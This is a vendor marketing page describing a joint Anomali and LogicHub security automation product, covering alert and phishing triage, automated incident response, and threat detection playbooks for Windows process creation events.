Maximizing Your SOC Efficiency and Effectiveness
Automate Threat Detection and Incident Response with Anomali and LogicHub
Anomali and LogicHub Joint Solution Features
- Automate Alert and Phishing Triage
Investigate and threat rank every alert by automating complex investigation playbooks quickly and easily as well as analysis and decision making by applying deep correlation and data science operators
- Automate Incident Response
Contain, mitigate, and respond with confidence by creating automations quickly and easily and ensure thorough investigations and catalog evidence documentation consistently
- Automate Threat Detection and Hunting
Identify unknown threats in real-time and gain deeper visibility into new threats by automating the expertise of a skilled analyst to hunt unknown threats
- Reduce your alert false positives by 95% and reduce MTTR by 10x by using advanced analytics and machine learning
- Interactive case management prioritizes the critical events
- Integration with Anomali and your other tools is seamless, rapid, and production-grade
Security Automation Meets the Threat Intelligence Platform
The LogicHub SOAR+ platform delivers autonomous detection and response, advanced analytics, and machine learning to automate decision making with extreme accuracy, LogicHub can automatically submit investigation artifacts, such as a URL or IP address, directly to Anomali. Anomali then returns a risk score for that artifact and LogicHub combines that score and correlates it with a range of other factors to provide a high-quality ranking of scored alerts. With LogicHub SOAR+, these threat reports can be implanted into threat detection playbooks based on Anomali threat intelligence and the MITRE ATT&CK™ framework, a globally-accessible knowledge base of adversary tactics and techniques.
Automate the process of intelligent decision making
Fast, scalable implementation on-premises and in the cloud
Focus on the truly critical incidents
Threat Detection for Windows Process Creation Events
Windows processes turn out to be a critical challenge for security analysts and Security Operations Centers (SOCs). Attackers are on the move, creating or deleting files, changing file permissions, downloading malware, creating accounts and performing other nefarious activities. These activities are being logged. But culling through these enormous log files for indications of attacks can be time-consuming, and time is something that SOC teams never have enough of.
LogicHub Threat Detection Playbook for Windows Process Creation Events is a playbook that applies automated analysis and advanced decision-making technology analysis to identify suspicious and malicious events with the accuracy of an experienced threat hunting team. LogicHub has refined and automated hundreds of threat hunting detection patterns and techniques and mapped them to the MITRE ATT&CK™ framework and enriches these using the Anomali Threat Intelligence Platform (TIP).
It typically takes months or longer and lots of work for a security team to build reliable and relevant threat detection content. The LogicHub Windows Events Creation playbook provides advanced analysis capabilities, machine-learning classification, and pattern matching built from libraries of hundreds of known attacks that can be readily deployed to your environment. This content will hone your threat detection activities, while reducing the time required for triage analysis.
Phishing Alert Triage
When phishing attacks work, they can be devastating. Instead of proactively investigating threats, analysts spend hours per day sorting through emails forwarded to a special inbox or collected in a quarantined folder for review. Even when security analysts do an excellent job discerning phishing attacks from innocent email, there’s usually no way for them to capture that expertise in a way that can be shared, automatically applied, and built on in the future.
LogicHub Phishing Triage is a security automation solution for the triage of reported phishing emails. Powered by Machine Learning (ML), LogicHub Phishing Triage rapidly and accurately analyzes emails and classifies them according to a SOC’s email threat categories, such as malicious, safe, or needs further review. An intuitive interface lets security analysts quickly review results and kick-off response workflows with a click. In typical customer scenarios, LogicHub is able to achieve 97% accuracy and reduce the number of phishing alerts requiring human analysis by 75% or more.
Dramatic reduction in the time required for analyzing suspicious emails, enabling analysts to spend more time on proactive threat-hunting and other strategic activities. ML-powered analysis that becomes only more accurate over time, applying results from analyzing real-life phishing scenarios. Integration with other security tools for implementing automated workflows and responses. Acceleration of responses to phishing threats, reducing the risk of data breaches and other types of security attacks.